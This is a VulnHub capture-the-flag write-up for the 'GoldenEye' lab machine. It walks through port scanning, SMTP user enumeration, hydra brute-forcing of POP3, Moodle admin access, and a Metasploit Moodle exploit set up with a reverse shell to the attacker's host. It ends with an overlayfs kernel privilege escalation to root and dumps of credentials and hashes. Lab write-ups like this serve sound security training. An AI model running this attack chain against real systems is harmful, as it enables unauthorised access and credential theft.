VulnHub : Golden Eye
8 June, 2021
Starting off with an nmap scan
$ nmap -A -sC -sV -O -p 1-65535 192.168.56.101
Starting Nmap 7.91 ( https://nmap.org )
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.00089s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open ssl/unknown
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after: 2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
55007/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE CAPA SASL(PLAIN) RESP-CODES UIDL TOP PIPELINING USER STLS
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:81:D0:3A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.89 ms 192.168.56.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.71 seconds
The website mentioned that /sev-home/ can be used to login but it required credentials
I ran SMTP enum next and got some results
$ /usr/share/legion/scripts/smtp-user-enum.pl -M VRFY -U /media/sf_Projects/HTB/wordlists/usernames.txt -t 192.168.56.101
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /media/sf_Projects/HTB/wordlists/usernames.txt
Target count ............. 1
Username count ........... 86771
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
exists.56.101: backup
exists.56.101: bin
exists.56.101: boris
exists.56.101: daemon
192.168.56.101: doak exists
exists.56.101: doak
192.168.56.101: list exists
exists.56.101: list
exists.56.101: lp
exists.56.101: mail
192.168.56.101: man exists
exists.56.101: man
exists.56.101: natalya
exists.56.101: news
exists.56.101: nobody
exists.56.101: postfix
exists.56.101: postmaster
exists.56.101: proxy
192.168.56.101: root exists
exists.56.101: root
exists.56.101: sync
21 results.
86771 queries in 253 seconds (343.0 queries / sec)
The webpage pointed to a script terminal.js
$ curl -s http://192.168.56.101/
<html>
<head>
<title>GoldenEye Primary Admin Server</title>
<link rel="stylesheet" href="index.css">
</head>
<span id="GoldenEyeText" class="typeing"></span><span class='blinker'> </span>
<script src="terminal.js"></script>
</html>
$ curl -s http://192.168.56.101/terminal.js
var data = [
{
GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>"
}
];
//
//Boris, make sure you update your default password.
//My sources say MI6 maybe planning to infiltrate.
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//InvincibleHack3r
//
//BTW Natalya says she can break your codes
//
var allElements = document.getElementsByClassName("typeing");
for (var j = 0; j < allElements.length; j++) {
var currentElementId = allElements[j].id;
var currentElementIdContent = data[0][currentElementId];
var element = document.getElementById(currentElementId);
var devTypeText = currentElementIdContent;
var i = 0, isTag, text;
(function type() {
text = devTypeText.slice(0, ++i);
if (text === devTypeText) return;
element.innerHTML = text + `<span class='blinker'> </span>`;
var char = text.slice(-1);
if (char === "<") isTag = true;
if (char === ">") isTag = false;
if (isTag) return type();
setTimeout(type, 60);
})();
}
An encoded password, let's see what I can make out of it. The encoding was that of HTML entity.
Password: InvincibleHack3r
I tried this with boris on the /sev-home path and the page mentioned
GoldenEye is a Top Secret Soviet oribtal weapons project. Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO) Please email a qualified GNO supervisor to receive the online GoldenEye Operators Training to become an Administrator of the GoldenEye system Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port Towards the end in the source there was a comment
Qualified GoldenEye Network Operator Supervisors:
Natalya
Boris
-->
I focussed on the POP3 port now and since I had no more information, I tried to brute force the password. After a couple of wordlists, /usr/share/wordlists/fasttrack.txt worked
$ hydra -l natalya,boris,Natalya,Boris -P /usr/share/wordlists/fasttrack.txt -s 55007 -f 192.168.56.101 pop3
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 225 login tries (l:1/p:225), ~15 tries per task
[DATA] attacking pop3://192.168.56.101:55007/
[STATUS] 97.00 tries/min, 97 tries in 00:01h, 128 to do in 00:02h, 16 active
...
[55007][pop3] host: 192.168.56.101 login: boris password: secret1!
[55007][pop3] host: 192.168.56.101 login: natalya password: bird
[STATUS] attack finished for 192.168.56.101 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished
Let's check both their emails now
$ telnet 192.168.56.101 55007
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS secret1!
+OK Logged in.
STAT
+OK 3 1838
LIST
+OK 3 messages:
1 544
2 373
3 921
.
RETR 1
+OK 544 octets
Return-Path: <root@127.0.0.1.goldeneye>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id D9E47454B1
for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: root@127.0.0.1.goldeneye
Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.
RETR 2
+OK 373 octets
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id C3F2B454B1
for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu
Boris, I can break your codes!
.
RETR 3
+OK 921 octets
Return-Path: <alec@janus.boss>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id 4B9F4454B1
for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: alec@janus.boss
Boris,
Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!
Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....
PS - Keep security tight or we will be compromised.
Similarly for natalya
$ telnet 192.168.56.101 55007
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER natalya
+OK
PASS bird
+OK Logged in.
LIST
+OK 2 messages:
1 631
2 1048
.
RETR 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id D5EDA454B1
for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu
Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.
Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
RETR 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 17C96454B1
for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu
Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)
Ok, user creds are:
username: xenia
password: RCP90rulez!
Boris verified her as a valid contractor so just create the account ok?
And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....
Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.
.
The path /gnocertdir lead to a Moodle instance. I was able to login using the credentials in Natalya's email. Looking around I found some communication between Dr. Doak and Xeniya
I thought of brute-forcing dorak's credentials as well since he was also in the SMTP user enumeration earlier and it worked
$ hydra -l doak -P /usr/share/wordlists/fasttrack.txt -s 55007 -f 192.168.56.101 pop3
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://192.168.56.101:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[STATUS] 67.00 tries/min, 134 tries in 00:02h, 88 to do in 00:02h, 16 active
[55007][pop3] host: 192.168.56.101 login: doak password: goat
[STATUS] attack finished for 192.168.56.101 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished
His one email had a set of credentials
$ telnet 192.168.56.101 55007
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER doak
+OK
PASS goat
+OK Logged in.
LIST
+OK 1 messages:
1 606
.
RETR 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 97DC24549D
for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu
James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?
Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......
username: dr_doak
password: 4England!
.
Found a secret message after logging in as dr_doak
# cat s3cret.txt
007,
I was able to capture this apps adm1n cr3ds through clear txt.
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.
Something juicy is located here: /dir007key/for-007.jpg
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
Something was visible in the hexdump of the image
# hexdump -C for-007.jpg
00000000 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c |......JFIF.....,|
00000010 01 2c 00 00 ff e1 00 e0 45 78 69 66 00 00 4d 4d |.,......Exif..MM|
00000020 00 2a 00 00 00 08 00 07 01 0e 00 02 00 00 00 15 |.*..............|
00000030 00 00 00 62 01 0f 00 02 00 00 00 0a 00 00 00 78 |...b...........x|
00000040 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 |.(...........1..|
00000050 00 00 00 06 00 00 00 82 01 3b 00 02 00 00 00 0a |.........;......|
00000060 00 00 00 88 02 13 00 03 00 00 00 01 00 01 00 00 |................|
00000070 87 69 00 04 00 00 00 01 00 00 00 92 00 00 00 00 |.i..............|
00000080 65 46 64 70 62 6e 52 6c 63 6a 45 35 4f 54 56 34 |eFdpbnRlcjE5OTV4|
00000090 49 51 3d 3d 00 00 47 6f 6c 64 65 6e 45 79 65 00 |IQ==..GoldenEye.|
000000a0 6c 69 6e 75 78 00 46 6f 72 20 4a 61 6d 65 73 00 |linux.For James.|
$ echo "eFdpbnRlcjE5OTV4IQ==" | base64 --decode
xWinter1995x!
I was able login again as admin:xWinter1995x! and this looked like Moodle's admin console. When I went to the "Messages" page now the title said "2.2.3: Messages", maybe a hint to the version of Moodle. Upon searching, I did find an exploit for this version of Moodle : https://www.exploit-db.com/exploits/29324 and unfortunately it required metasploit to run. At first it didn't run as well but when I changed the spellchecker to PSpellShell through the admin console, it worked!
msf6 exploit(multi/http/moodle_cmd_exec) > show options
Module options (exploit/multi/http/moodle_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD xWinter1995x! yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.56.101 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SESSKEY no The session key of the user to impersonate
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /gnocertdir yes The URI of the Moodle installation
USERNAME admin yes Username to authenticate with
VHOST severnaya-station.com no HTTP server virtual host
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.103 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
I began exploring
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ whoami
whoami
www-data
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
boris:x:1000:1000:boris,,,:/home/boris:/usr/sbin/nologin
dovecot:x:103:112:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:104:113:Dovecot login user,,,:/nonexistent:/bin/false
postfix:x:105:114::/var/spool/postfix:/bin/false
postgres:x:106:116:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
natalya:x:1002:1002:,,,:/home/natalya:/usr/sbin/nologin
doak:x:1001:1001:,,,:/home/doak:/usr/sbin/nologin
# Found some DB credentials in /var/www/html/gnocertdir/config.php
$CFG->dbtype = 'pgsql';
$CFG->dblibrary = 'native';
$CFG->dbhost = 'localhost';
$CFG->dbname = 'moodle';
$CFG->dbuser = 'moodle';
$CFG->dbpass = 'trevelyan006x';
$CFG->prefix = 'mdl_';
$CFG->dboptions = array (
'dbpersist' => 0,
'dbsocket' => '',
);
mdl_user table had some password hashes
moodle=> SELECT username, password FROM mdl_user;
SELECT username, password FROM mdl_user;
-[ RECORD 1 ]------------------------------
username | guest
password | aca21c6dbd0538a171ff16550b873d70
-[ RECORD 2 ]------------------------------
username | xenia
password | 116672a0e281b6aa277ef78f53a5f6f9
-[ RECORD 3 ]------------------------------
username | dr_doak
password | 488e0292fac2386d877e80f2e3a203bf
-[ RECORD 4 ]------------------------------
username | boris
password | efaf365b88dee2fc2029ff20674658a7
-[ RECORD 5 ]------------------------------
username | natalya
password | 7a442035ba13c5d22e1e163e2117eb0d
-[ RECORD 6 ]------------------------------
username | admin
password | de51800b0404d41fcb51203f1e3e524a
linpeas also revealed two password hashes
[+] Readable *_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .gitconfig, .git-credentials, .git, .svn, .rhosts, hosts.equiv
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#read-sensitive-data
-rwxr-xr-x 1 www-data www-data 86 Apr 23 2018 /etc/apache2/.htpasswd
Reading /etc/apache2/.htpasswd
boris:$apr1$vg2drJim$wUDKP9TLw5jq4GS5jq2240
ops:$apr1$mVvEblRU$oHDbEs4QP2YTUG25Z1PoP.
I also found a file /var/www/html/splashAdmin.php
<html>
<body background="space.gif">
<h2 style="color:green;">Cobalt Qube 3 has been decommissioned</h2>
<br/>
<h3 style="color:white;">We can use this page to put up team photos, discussion, etc. Natalya is not allowed to post here though --Boris</h3>
<br/><br/>
<hr>
<p style="color:red;">Here's me with my new sniper rifle.</p>
<br/><br/>
<img src="sniper.png">
<br/>
<hr>
<p style="color:orange;">
Boris why are you wearing shorts in that photo? You do realize you're stationed above the Arctic circle, correct?
<br/><br/>
BTW your favorite pen broke, but I replaced it with a new special one.
<br/><br/>
Natalya "best coder" S.</p>
<hr>
<p style="color:red;">"License to Kill - Complex Grenade Launchers - No Oddjob" - Unknown"</p>
<hr>
<p style="color:white;">Greetings ya'll! GoldenEye Admin here.
<br/><br/>
For programming I highly prefer the Alternative to GCC, which FreeBSD uses. It's more verbose when compiling, throwing warnings and such - this can easily be turned off with a proper flag. I've replaced GCC with this throughout the GolenEye systems.
<br/><br/>
Boris, no arguing about this, GCC has been removed and that's final!
<br/><br/>
Also why have you been chatting with Xenia in private Boris? She's a new contractor that you've never met before? Are you sure you've never worked together...?
<br/><br/>
-Admin
</p>
<hr>
<p style="color:purple;">
Janus was here
</p>
<hr>
</body>
</html>
I didn't get anywhere with the hashes or any other files/clues revealed by enumeration. So I moved onto kernel exploits, since the kernel version was highlighted in golden yellow by linpeas. I found a potential exploit but it was using gcc which as we learned earlier isn't installed. Instead there is clang
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | linux/local/37292.c
www-data@ubuntu:/tmp$ ./37292
./37292
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 1: gcc: not found
couldn't create dynamic library
lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
It worked
www-data@ubuntu:/tmp$ ./37292
./37292
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# whoami
whoami
root
# cd /root
cd /root
# ls -ltrha
ls -ltrha
total 44K
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw-r--r-- 1 root root 3.1K Feb 19 2014 .bashrc
-rw------- 1 root root 1.0K Apr 23 2018 .rnd
drwxr-xr-x 22 root root 4.0K Apr 24 2018 ..
drwx------ 2 root root 4.0K Apr 28 2018 .cache
-rw------- 1 root root 8.2K Apr 29 2018 .viminfo
-rw------- 1 root root 144 Apr 29 2018 .flag.txt
drwx------ 3 root root 4.0K Apr 29 2018 .
-rw-r--r-- 1 root root 19 May 3 2018 .bash_history
# cat .flag.txt
cat .flag.txt
Alec told me to place the codes here:
568628e0d993b1973adc718237da6e93
If you captured this make sure to go here.....
/006-final/xvf7-flag/
# pwd
pwd
/var/www/html/006-final/xvf7-flag
# ls
ls
index.css index.html index.js key.webm
# cat index.html
cat index.html
<html>
<head>
<link rel="stylesheet" href="index.css">
</head>
<video poster="val.jpg" id="bgvid" playsinline autoplay muted loop>
<source src="key.webm" type="video/webm">
</video>
<div id="golden">
<h1>Flag Captured</h1>
<p>Congrats! ******************************* </p>
<p>You've captured the codes! And stopped Alec Trevelyan from his indestructible vengeance!!!!</p>
<p>****************************************</p>
</div>
<script src="index.js"></script>
</html>